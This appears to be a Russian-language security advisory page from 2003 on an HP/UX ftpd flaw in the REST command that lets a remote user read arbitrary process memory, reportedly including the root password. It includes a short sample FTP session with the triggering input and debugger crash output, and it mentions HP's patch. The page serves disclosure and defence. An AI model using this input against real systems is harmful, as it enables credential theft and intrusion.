Просмотр содержания произвольных файлов в памяти системы в HP/UX 'ftpd'

Дата публикации:
10.06.2003
Всего просмотров:
754
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в HP/UX 'ftpd' в команде REST. Удаленный пользователь может просматривать содержание произвольных файлов в памяти системы.

Сообщается, что удаленный пользователь может использовать команду REST (reset) и определить местоположение памяти, чтобы просматривать содержание файлов из памяти. Пример: (еще несколько примеров можно найти в источнике сообщения):

frieza elguapo $ ftp 192.168.1.111
 Connected to 192.168.1.111.
 220 kakarot FTP server (Version 1.1.214.4 Mon Feb 15 08:48:46 GMT 1999) ready.
 Name (192.168.1.111:root): elguapo
 331 Password required for elguapo.
 Password:
 230 User elguapo logged in.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> rest 1111111111111111
 restarting at 2147483647. execute get, put or append to initiate transfer
 ftp> get .
 local: . remote: .
 200 PORT command successful.

# gdb /usr/lbin/ftpd 2862
GNU gdb 4.18-hppa-991112
Copyright 1998 Free Software Foundation, Inc.

/home/elguapo/2862: No such file or directory.
Attaching to program: /usr/lbin/ftpd, process 2862

Unable to find __dld_flags symbol in object file.

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xc00ef0b8 in ?? ()
(gdb) bt
#0  0xc00ef0b8 in ?? ()
Error accessing memory address 0x7fffffff: Bad address.

(gdb) info registers r3 r11
        r3: 7fffffff
       r11: 7fffffff
Уязвимость может использоваться, например, для получения root пароля из памяти.

Уязвимость связана с неправильным использованием конверсионного символа в строке формата.

Уязвимость обнаружена в HP/UX ftpd 1.1.214.4

Hewlett Packard выпустил заплату PHNE_18377, устраняющую эту уязвимость.

Ссылки: HPUX ftpd remote issue via REST

или введите имя

CAPTCHA